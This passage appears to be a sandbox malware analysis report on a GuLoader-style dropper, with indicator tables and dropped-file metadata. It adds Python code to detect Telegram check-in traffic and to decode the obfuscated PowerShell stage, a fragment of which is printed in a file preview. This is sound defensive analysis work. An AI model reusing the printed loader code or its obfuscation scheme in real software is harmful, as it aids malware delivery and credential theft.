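2024-07-24T09:10:00 WS-0017 api.telegram.org
2024-07-24T09:30:00 WS-0099 checkip.dyndns.org
2024-07-24T10:15:00 WS-0099 api.telegram.org
"""


def parse(log: str):
    """Yield (timestamp, host, domain) tuples; blank lines are skipped."""
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, host, domain = line.split()
        yield datetime.fromisoformat(ts), host, domain.lower()


def find_checkin_sequences(log: str, window_minutes: int = 10):
    """Return {host: (lookup_domain, lookup_ts, telegram_ts)} for every host whose
    most recent IP-lookup request is followed by api.telegram.org within the window.
    Only the first qualifying Telegram request per host is reported."""
    window = timedelta(minutes=window_minutes)
    last_lookup = {}  # host -> (domain, timestamp) of the latest IP-lookup request
    hits = {}
    for ts, host, domain in sorted(parse(log)):
        if domain in IP_LOOKUP_DOMAINS:
            last_lookup[host] = (domain, ts)
        elif domain == EXFIL_DOMAIN and host in last_lookup and host not in hits:
            lookup_domain, lookup_ts = last_lookup[host]
            if ts - lookup_ts <= window:
                hits[host] = (lookup_domain, lookup_ts, ts)
    return hits


if __name__ == "__main__":
    for host, (dom, t0, t1) in find_checkin_sequences(SAMPLE_LOG).items():
        print(f"{host}: {dom} at {t0.time()} then {EXFIL_DOMAIN} at {t1.time()}")
```

Telegram traffic on its own is not a useful signal (the TELEGRAMRU rows above include unrelated families and plenty of benign bots use the same API); the lookup-then-exfil ordering from one host is what separates this stealer's check-in from ordinary use, so the window is deliberately short and should be tuned against your own baseline.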
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| TELEGRAMRU | Bootstrapper.exe | malicious | Hancitor, Vidar | 149.154.167.99 |
| TELEGRAMRU | LisectAVT_2403002C_60.exe | malicious | PureLog Stealer, Vidar | 149.154.167.99 |
| TELEGRAMRU | LisectAVT_2403002C_67.exe | malicious | PureLog Stealer, Vidar | 149.154.167.99 |
| TELEGRAMRU | LisectAVT_2403002C_81.exe | malicious | Vidar | 149.154.167.99 |
| TELEGRAMRU | Lisect_AVT_24003_G1B_119.exe | malicious | Unknown | 149.154.167.220 |
| TELEGRAMRU | CraxsRat VIP.exe | malicious | Unknown | 149.154.167.99 |
| TELEGRAMRU | Lisect_AVT_24003_G1B_119.exe | malicious | Unknown | 149.154.167.220 |
| TELEGRAMRU | Lisect_AVT_24003_G1B_33.exe | malicious | Unknown | 149.154.167.220 |
| TELEGRAMRU | DSD876543456780000.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| TELEGRAMRU | f84038a5c35557bb57839423dcab27287ac5ab490fca503f496df61da5e2bc99.exe | malicious | Bdaejec, Vidar | 149.154.167.99 |
| CLOUDFLARENETUS | NB4EASbynx.msi | malicious | LummaC | 188.114.96.3 |
| CLOUDFLARENETUS | Confirmation Order.js | malicious | Snake Keylogger | 188.114.97.3 |
| CLOUDFLARENETUS | Scan file.doc | malicious | Unknown | 188.114.96.3 |
| CLOUDFLARENETUS | LisectAVT_2403002C_15.exe | malicious | AgentTesla | 104.26.13.205 |
| CLOUDFLARENETUS | LisectAVT_2403002C_16.exe | malicious | AgentTesla | 104.26.12.205 |
| CLOUDFLARENETUS | nX1oQE2we8.exe | malicious | CryptOne, Qbot | 104.21.34.74 |
| CLOUDFLARENETUS | LisectAVT_2403002C_18.exe | malicious | Raccoon | 188.114.96.3 |
| CLOUDFLARENETUS | gbl.exe | malicious | Unknown | 104.26.4.75 |
| CLOUDFLARENETUS | LisectAVT_2403002C_18.exe | malicious | Raccoon | 188.114.97.3 |
| CLOUDFLARENETUS | gbl.exe | malicious | Unknown | 172.67.68.40 |
| ORACLE-BMC-31898US | Lisect_AVT_24003_G1B_67.exe | malicious | Unknown | 158.101.28.51 |
| ORACLE-BMC-31898US | DSD876543456780000.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242 |
| ORACLE-BMC-31898US | Confirmation transfer Note AGS # 22-00379.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242 |
| ORACLE-BMC-31898US | counter.exe | malicious | Bdaejec | 158.101.87.161 |
| ORACLE-BMC-31898US | rPO0977-6745.exe | malicious | Snake Keylogger | 158.101.44.242 |
| ORACLE-BMC-31898US | z1QuotationSheetVSAA6656776.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242 |
| ORACLE-BMC-31898US | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242 |
| ORACLE-BMC-31898US | rRFQ_025261-97382.exe | malicious | Snake Keylogger | 158.101.44.242 |
| ORACLE-BMC-31898US | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242 |
| ORACLE-BMC-31898US | Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 54328bd36c14bd82ddaa0c04b25ed9ad | Confirmation Order.js | malicious | Snake Keylogger | 188.114.96.3 |
| 54328bd36c14bd82ddaa0c04b25ed9ad | Lisect_AVT_24003_G1B_21.exe | malicious | Unknown | 188.114.96.3 |
| 54328bd36c14bd82ddaa0c04b25ed9ad | Lisect_AVT_24003_G1B_21.exe | malicious | Unknown | 188.114.96.3 |
| 54328bd36c14bd82ddaa0c04b25ed9ad | Lisect_AVT_24003_G1B_127.exe | malicious | PureLog Stealer | 188.114.96.3 |
| 54328bd36c14bd82ddaa0c04b25ed9ad | DSD876543456780000.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3 |
| 54328bd36c14bd82ddaa0c04b25ed9ad | SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exe | malicious | Lokibot | 188.114.96.3 |
| 54328bd36c14bd82ddaa0c04b25ed9ad | Deye Union - PO # 23081377.exe | malicious | Snake Keylogger | 188.114.96.3 |
| 54328bd36c14bd82ddaa0c04b25ed9ad | rPO0977-6745.exe | malicious | Snake Keylogger | 188.114.96.3 |
| 54328bd36c14bd82ddaa0c04b25ed9ad | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3 |
| 54328bd36c14bd82ddaa0c04b25ed9ad | Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3 |
| 3b5074b1b5d032e5620f69f9f700ff0e | LisectAVT_2403002C_15.exe | malicious | AgentTesla | 149.154.167.220 |
| 3b5074b1b5d032e5620f69f9f700ff0e | LisectAVT_2403002C_16.exe | malicious | AgentTesla | 149.154.167.220 |
| 3b5074b1b5d032e5620f69f9f700ff0e | jRlq1fSUW5.exe | malicious | AgentTesla | 149.154.167.220 |
| 3b5074b1b5d032e5620f69f9f700ff0e | Q2XwE8NRLx.exe | malicious | Quasar | 149.154.167.220 |
| 3b5074b1b5d032e5620f69f9f700ff0e | Lisect_AVT_24003_G1A_33.exe | malicious | Unknown | 149.154.167.220 |
| 3b5074b1b5d032e5620f69f9f700ff0e | Lisect_AVT_24003_G1B_84.msi | malicious | AteraAgent | 149.154.167.220 |
| 3b5074b1b5d032e5620f69f9f700ff0e | Lisect_AVT_24003_G1B_33.exe | malicious | Unknown | 149.154.167.220 |
| 3b5074b1b5d032e5620f69f9f700ff0e | Lisect_AVT_24003_G1B_122.exe | malicious | Unknown | 149.154.167.220 |
| 3b5074b1b5d032e5620f69f9f700ff0e | DD Spotify Acc Gen.exe | malicious | Blank Grabber, Umbral Stealer | 149.154.167.220 |
| 3b5074b1b5d032e5620f69f9f700ff0e | Lisect_AVT_24003_G1B_127.exe | malicious | PureLog Stealer | 149.154.167.220 |
| 37f463bf4616ecd445d4a1937da06e19 | LisectAVT_2403002C_159.exe | malicious | Bdaejec, DarkSide | 185.98.5.168 |
| 37f463bf4616ecd445d4a1937da06e19 | nX1oQE2we8.exe | malicious | CryptOne, Qbot | 185.98.5.168 |
| 37f463bf4616ecd445d4a1937da06e19 | LisectAVT_2403002C_160.exe | malicious | Upatre | 185.98.5.168 |
| 37f463bf4616ecd445d4a1937da06e19 | Bootstrapper.exe | malicious | Hancitor, Vidar | 185.98.5.168 |
| 37f463bf4616ecd445d4a1937da06e19 | LisectAVT_2403002C_57.exe | malicious | Unknown | 185.98.5.168 |
| 37f463bf4616ecd445d4a1937da06e19 | LisectAVT_2403002C_57.exe | malicious | Unknown | 185.98.5.168 |
| 37f463bf4616ecd445d4a1937da06e19 | LisectAVT_2403002C_60.exe | malicious | PureLog Stealer, Vidar | 185.98.5.168 |
| 37f463bf4616ecd445d4a1937da06e19 | LisectAVT_2403002C_67.exe | malicious | PureLog Stealer, Vidar | 185.98.5.168 |
| 37f463bf4616ecd445d4a1937da06e19 | LisectAVT_2403002C_64.exe | malicious | Unknown | 185.98.5.168 |
| 37f463bf4616ecd445d4a1937da06e19 | LisectAVT_2403002C_81.exe | malicious | Vidar | 185.98.5.168 |
                                          No context
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):8003
                                          Entropy (8bit):4.840877972214509
                                          Encrypted:false
                                          SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                          MD5:106D01F562D751E62B702803895E93E0
                                          SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                          SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                          SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Category:dropped
                                          Size (bytes):1283968
                                          Entropy (8bit):7.384565087462512
                                          Encrypted:false
                                          SSDEEP:24576:qZbqxGFMhCGa7cQPncULq/YWx7k83oD1dEUu28KkzFu7biFA:ybqxGFMhCGa7cQ0ULxWx6MXLFgbi+
                                          MD5:ECC4FF0EE7D123F0E90587EA3A7B9AE3
                                          SHA1:70E6F747F9BAE57619817BEB11F836FA8A873726
                                          SHA-256:1E0A46FD7B7B0706D4D5918BA666ABDCCCC67BE4BE89874B5CB2CA9EA8B12A83
                                          SHA-512:28F1D457D0A8556CF0BD62FC33556B22D3307E0527A25D451877BCAA9B76B1595D5170E5A221491007D2E8CA5E3A5F384C556F40830576DC942AA0252DBE8A71
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 11%
                                          Reputation:low
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....\.U.................^...*.......1.......p....@.................................[#....@..................................t..................... ...`............................................................p...............................text....].......^.................. ..`.rdata..T....p.......b..............@..@.data................v..............@....ndata...P...............................rsrc...............|..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview:[ZoneTransfer]....ZoneId=0
                                          Process:C:\Users\user\Desktop\Torpernes.exe
                                          File Type:ASCII text, with very long lines (54418), with no line terminators
                                          Category:dropped
                                          Size (bytes):54418
                                          Entropy (8bit):5.380872173369229
                                          Encrypted:false
                                          SSDEEP:1536:AsNKLSSANLNd+FFzONIjxMoqrnDlHIgiRYX3sJkLOcY:AFLSPE1MEI7K1YX3u0OcY
                                          MD5:B77B0DEE3BF32770AF375C4C87E19478
                                          SHA1:D97F7CF179F27860AC856437F256D8A473497472
                                          SHA-256:05CB2B925D951BF1348C00B0B69B21E9EA7F8C4F3022636E89EED64C043BAF78
                                          SHA-512:2A389AF9BBC0A656F4FC1249E4F2ABDA08C578B54AB141308836D246BA9AE8CC9268E4182147692530EA39484BC794184321C355821654E39CC771B18D500A65
                                          Malicious:true
                                          Reputation:low
                                          Preview:$Frugtbarhed=$Trskelpriserne90;<#Knackwurst Corpuscularian Unsportiveness #><#Skrivestuen Hieronymic Albion #><#Prologs Hexateuch Bndelormenes Nonofficeholding Uredo Mesectoderm #><#Dokkes Hjerteimpulsens Hulkingness Pluvioscopic Byeworkman #><#Jdedommen Vms Nationalbudgetterne Sololier Earpick Olymp #><#Teston Jubilumsmiddage Forhaandslaanets Vejet Netvrksprinter Nonmembership Udskrabningen #>$Erhvervsmand = " Sev ; Im,i`$ TropS StorkEn.iny,eodidZ bujePre,epPisser.eanda S,vemSpurpsTramp1Grist7pa as5 pilf=Com,o`$ExtraCBreaketampelEksamlStalduchundlbiogro.elikiPrecod nosoepleu,n Disks Enerr V,lgaTacannDokstdStatssBri ekInexpaSuperthomontTridee,asted In reSelvtsSigis; ForsF L.xiuUndesnBlotlcVersetBese,iEpiteoTumernBrans Trunca ernrfInfi,gJasmiiMucklf.ntibtTigers ,erisAfva k ml,er .ernuBansheTurnvn ynde Brais(Sen.t`$ EkskTVand.n Fin,d ByguiInternPriong A hesSmrebnC.okfgPipefl CheeeDerivnK.rtesSooch1Sideb3Total1 Damo, Benz Vand,`$PolytD nbeelobbyftribeiEmotenRa,ioi FjertAnt,ri.erros Ove.e
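The 54418-byte script previewed above is the PowerShell stage that the report's "Found suspicious powershell code related to unpacking or dynamic code loading" signature refers to. Its real statements are buried in the long double-quoted string assigned to `$Erhvervsmand`: once the PowerShell escape sequence "`$" is reduced to a plain "$", keeping every sixth character starting at offset 5 yields `;$Skydeprams175=$Celluloidensrandskattedes;Function afgiftsskruen ($Tndingsnglens131,` (the Danish æ/ø are already absent, which matches the "ASCII text" file type). The decoder below is an added example, not part of the Joe Sandbox report or of the sample; the text it works on is copied from the preview line, the stride and offset are inferred from that preview only and may differ in other GuLoader builds, and the scoring used by `guess_stride` is my own heuristic.

```python
"""
Recover the hidden PowerShell statements from a GuLoader-style padded string
by keeping every N-th character.  Added example, not Joe Sandbox tooling.
"""
import re

# Copied from the preview of the dropped script (the value assigned to
# $Erhvervsmand, up to the first ~500 characters).  "`$" is PowerShell's escape
# for a literal "$" inside a double-quoted string and is kept verbatim here.
SAMPLE = (
    " Sev ; Im,i`$ TropS StorkEn.iny,eodidZ bujePre,epPisser.eanda"
    " S,vemSpurpsTramp1Grist7pa as5 pilf=Com,o`$"
    "ExtraCBreaketampelEksamlStalduchundlbiogro.elikiPrecod"
    " nosoepleu,n Disks Enerr V,lgaTacannDokstdStatssBri ekInexpaSuperthomontTridee,asted In reSelvtsSigis;"
    " ForsF L.xiuUndesnBlotlcVersetBese,iEpiteoTumernBrans Trunca ernrfInfi,gJasmii"
    "Mucklf.ntibtTigers ,erisAfva k ml,er .ernuBansheTurnvn ynde Brais(Sen.t`$"
    " EkskTVand.n Fin,d ByguiInternPriong A hesSmrebnC.okfgPipefl CheeeDerivnK.rtesSooch1Sideb3Total1 Damo,"
)

# A "$name" directly followed by =, ;, (, , or ) is what a PowerShell statement
# looks like and what random padding almost never produces.  Heuristic (assumption).
_PS_TOKEN = re.compile(r"\$\w+\s*[=;(,)]")


def unescape_ps_string(text: str) -> str:
    """Undo the double-quoted-string escape the padding relies on ("`$" -> "$")."""
    return text.replace("`$", "$")


def recover_script(text: str, stride: int, offset: int) -> str:
    """Keep every `stride`-th character of the unescaped string, starting at `offset`."""
    return unescape_ps_string(text)[offset::stride]


def guess_stride(text: str, max_stride: int = 10):
    """Try every (stride, offset) pair up to `max_stride` and return the one whose
    output contains the most PowerShell-looking variable tokens."""
    best_score, best = -1, (0, 0)
    for stride in range(2, max_stride + 1):
        for offset in range(stride):
            score = len(_PS_TOKEN.findall(recover_script(text, stride, offset)))
            if score > best_score:
                best_score, best = score, (stride, offset)
    return best


if __name__ == "__main__":
    stride, offset = guess_stride(SAMPLE)
    print(f"stride={stride} offset={offset}")
    print(recover_script(SAMPLE, stride, offset))
```

Run this against the full dropped file rather than the preview when doing it for real: the preview is cut off mid-string, and the next statement (`$Skydeprams175`, a variable, is assigned; `afgiftsskruen` is a function taking `$Tndingsnglens131` and a second parameter) only becomes readable with the complete text. A mis-aligned stride shows up immediately as gibberish, so the `guess_stride` score doubles as a sanity check on the recovered text.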
                                          Process:C:\Users\user\Desktop\Torpernes.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):328797
                                          Entropy (8bit):7.815397462071498
                                          Encrypted:false
                                          SSDEEP:6144:gRGYT84P6OIpXGZP31SmNYayhBJxWj9DlcK77hA456in:MT84COSsFSdaCxYn
                                          MD5:6CA54912856A504C6D0347BD9B57DDFD
                                          SHA1:7C9354362785D249DF664498EAD9AE7246F244FE
                                          SHA-256:0E91233482A61EB85E81D38C4E838E7B2157A27431CF6180BDBD4B995C35AAFA
                                          SHA-512:D5F868C39390B2AE6A571292F96B802D0401B3F57607B6769D3B566DC6E632CB61036372142930F51746785C03EA0EE31C69BF4B3351E718A093879BFB77D7B1
                                          Malicious:false
                                          Preview:.zz....../.......q....._................FFF......mmmmm......I........A........................BB..t...............WWWW.....ff...>.%.....|.T............ooooo........U.........-..........k....T.W......''''''........<<.o.((...D."..............'............O......-........N...........h..r....................ff............................8.|................ss....888..............................h....................yy............I...FFF......$.66......l.......>.....>>>>.............b........f..........0....i...................H.*.......o....zz.....=.......................)..............&&..............;..o..............WW.1.................FFFF.{{{..s........u.<<..............'.........................................7.33...........QQ...............}."....ss.@.................NN....9........88...... .FFFFF.-....................%%......a.t..11...%%%...................333.......WWW.....S.................''..........;..@........$$.....//////.........."...NNNNNN....O..............K..pp.E......
                                          Process:C:\Users\user\Desktop\Torpernes.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):944215
                                          Entropy (8bit):1.253403336418641
                                          Encrypted:false
                                          SSDEEP:1536:UyGaAJZQVIsL4WNkRjeGXJIp9Oc52NVuN75fZTD5p1v5E1bkGgMF/3tDLREMUPS+:UyGxUL4a6vXJIWhru791ublLeDPS0ASD
                                          MD5:1CB1238607E8954A7923966A49CDB3E0
                                          SHA1:BFF6A1E896BB0BE28E1BFCFD0094BCD36078D849
                                          SHA-256:6A76541EE87E4E7E547F500D01CC9D50EE681DBF067FE8D4E5735F5BD22AC999
                                          SHA-512:4B691C9C24C15DA18B9C3F221333692F1CA364B96765AE94EC01FD2BF004449A57DDE3E6E89B8A567DA2FC05F53BA7FBA853AC8B367F298A1C444CCC5F3DAE5F
                                          Malicious:false
                                          Preview:..................&................}..........A.;.............'........................"...............k............................................................................................................B..............................K.................Z......................................q........................^............................_....5.............v.............c....2.......^..........................................................&........."..D.*0.........................................w.....(......w...............................................................K....v...........................v.........................................>...................................................................+.a......$.._........7.............................`..........[......................................................................................................................{.......G....................b..]................................................
                                          Process:C:\Users\user\Desktop\Torpernes.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):962689
                                          Entropy (8bit):1.2611239746227794
                                          Encrypted:false
                                          SSDEEP:3072:3wRHrOD/R6APMwv2g5tvYRY0zgsRVL7YapsU7:3KHri/3P20wRB8CYE77
                                          MD5:5318799C0891E41C4824B117782D972C
                                          SHA1:B7708ECD85A69E6158EA05A6B5BDC1B8CE826199
                                          SHA-256:254A5A9B8B3F20A38A993C62D3F16EE3F7D98176769F97C58248C27C77A4C032
                                          SHA-512:9AA1B82B35C17D11B57749B399F4280F2D2FD111AA8523E1FA7CB82DBAC3A968F3CBE09310B4A592550517CC10F2EDCE63F919AE1399FD8160D55B0A8E65866E
                                          Malicious:false
                                          Preview:.Q........................................................m................................................................d.................................................#..............................................................................................!..@...............2...............................................................................Z............................^.............\.......A..................... .....l.....<...P......................3...........................E..........................................-.............................................................9..................1....=....`...q................3.............d.....g..................J..o......*.......................................................................g..............Z........................................................;..e....@.......................................................a....9......w{.......................................................B.."........
                                          Process:C:\Users\user\Desktop\Torpernes.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):258
                                          Entropy (8bit):4.211163838509549
                                          Encrypted:false
                                          SSDEEP:6:zDW+YfJM8yFa2cip84JmfABwvPDOrCK6ZLtpAS/cV0rg1CkFL:ChMzFa2cip8MDwvPDOrXS4Ag1C+L
                                          MD5:17EACC32277AC454B9E9981F5E3EA80B
                                          SHA1:6D18F25A482B59AB8AC0D485D9594A147320B396
                                          SHA-256:C03BC7EDD150C4DC8A88F160D8863489F09AACEE6F9CE5071E0D962332522A6C
                                          SHA-512:2854AE7B957D8DD01436DB85587E61B348990452E546785C907A50CE0253338CAA1CA268800426243B35C11BDAA32CFC8115A1FC8F4E9081B8DA36822CD107A7
                                          Malicious:false
                                          Preview:damebladets skips modeskaber trillingfdslers tilgodeskrevne..lysforhold strofernes mbelfabrikants.forhoret straahattes almuemblernes,relaterede deratized overslight,tailordom faggoty allene unhushed nonavoidableness reallotting..eufomaniens taletidens media.
                                          Process:C:\Users\user\Desktop\Torpernes.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):802681
                                          Entropy (8bit):1.2504268364374471
                                          Encrypted:false
                                          SSDEEP:1536:NKhLrR2iZCjGIP8dRVIVuLWjmO7fg7RKVFw+UPDsVTWD04FMUtdmTWO5XQc/G9vp:URN2sRoTzFB6D046UOPJu9vvio
                                          MD5:176BA5DE5FE97864B7468DD8BCE8C38E
                                          SHA1:01804C24EDC45329980BF040FCF8EFFFAF4B471D
                                          SHA-256:84DFBA8A9B3F62629795FA225C836FDCD3708595325E98F6248E3C72A4DD6C9B
                                          SHA-512:EC9E44DA08D30FC5241BB06792127530993B038A1B0C20A546241EAD3663AFCFD2E4C02F73465A0723E1D9E7DF10FCB6C19888776911C49F646ABF6EB5E70254
                                          Malicious:false
                                          Preview:`..........T.................................................................Eg..............................Zy.......................................!......7............................................_.....................................................?........../...u....................H...........p.............|...........................................................y................................e...................u...................<..............>....................i..........My.......................S.............f..............................+..................7..................H..................8..................../...........n..P3....z............u..n..................................h.....{.....V..................................................................................................................D........................?Z.....r.................................K......D.........................................................................j.......
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.384565087462512
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Torpernes.exe
                                          File size:1'283'968 bytes
                                          MD5:ecc4ff0ee7d123f0e90587ea3a7b9ae3
                                          SHA1:70e6f747f9bae57619817beb11f836fa8a873726
                                          SHA256:1e0a46fd7b7b0706d4d5918ba666abdcccc67be4be89874b5cb2ca9ea8b12a83
                                          SHA512:28f1d457d0a8556cf0bd62fc33556b22d3307e0527a25d451877bcaa9b76b1595d5170e5a221491007d2e8ca5e3a5f384c556f40830576dc942aa0252dbe8a71
                                          SSDEEP:24576:qZbqxGFMhCGa7cQPncULq/YWx7k83oD1dEUu28KkzFu7biFA:ybqxGFMhCGa7cQ0ULxWx6MXLFgbi+
                                          TLSH:0655D0153A49890ED2936B788E58F37A5764DFCD3A16830296F0CDB7F9ACD8BAD405C0
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....\.U.................^...*.......1.......p....@
                                          Icon Hash:49f571b3129a9201
                                          Entrypoint:0x4031ff
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x55C15CE0 [Wed Aug 5 00:46:24 2015 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:7ed0d71376e55d58ab36dc7d3ffda898
                                          Signature Valid:false
                                          Signature Issuer:CN="Vicegerents Nolendes ", O=Slvknappede, L=Rockwood, S=Michigan, C=US
                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                          Error Number:-2146762487
                                           Not Before | Not After
                                           • 20/08/2023 04:02:09 | 19/08/2026 04:02:09
                                          Subject Chain
                                          • CN="Vicegerents Nolendes ", O=Slvknappede, L=Rockwood, S=Michigan, C=US
                                          Version:3
                                          Thumbprint MD5:8F6ED964E29B10521097F5E1F2D31785
                                          Thumbprint SHA-1:022CE78AA85D6D20EF075D7499744D4516AADF30
                                          Thumbprint SHA-256:E3E76A1533813ED1A2A55533A06A026F62239ED962B809E576E401949A4C3B91
                                          Serial:0F4BC7A006DB1332596FDFB90A31A28AB0444F58
                                          Instruction
                                          sub esp, 000002D8h
                                          push ebx
                                          push ebp
                                          push esi
                                          push edi
                                          push 00000020h
                                          xor ebp, ebp
                                          pop esi
                                          mov dword ptr [esp+18h], ebp
                                          mov dword ptr [esp+10h], 004092D8h
                                          mov dword ptr [esp+14h], ebp
                                          call dword ptr [00407034h]
                                          push 00008001h
                                          call dword ptr [00407134h]
                                          push ebp
                                          call dword ptr [004072ACh]
                                          push 00000009h
                                          mov dword ptr [00429278h], eax
                                          call 00007F956115D836h
                                          mov dword ptr [004291C4h], eax
                                          push ebp
                                          lea eax, dword ptr [esp+38h]
                                          push 000002B4h
                                          push eax
                                          push ebp
                                          push 00420670h
                                          call dword ptr [0040717Ch]
                                          push 004092C0h
                                          push 004281C0h
                                          call 00007F956115D4A1h
                                          call dword ptr [00407138h]
                                          mov ebx, 00434000h
                                          push eax
                                          push ebx
                                          call 00007F956115D48Fh
                                          push ebp
                                          call dword ptr [0040710Ch]
                                          push 00000022h
                                          mov dword ptr [004291C0h], eax
                                          pop edi
                                          mov eax, ebx
                                          cmp word ptr [00434000h], di
                                          jne 00007F956115A8F9h
                                          mov esi, edi
                                          mov eax, 00434002h
                                          push esi
                                          push eax
                                          call 00007F956115CEDFh
                                          push eax
                                          call dword ptr [00407240h]
                                          mov ecx, eax
                                          mov dword ptr [esp+1Ch], ecx
                                          jmp 00007F956115A9EBh
                                          push 00000020h
                                          pop edx
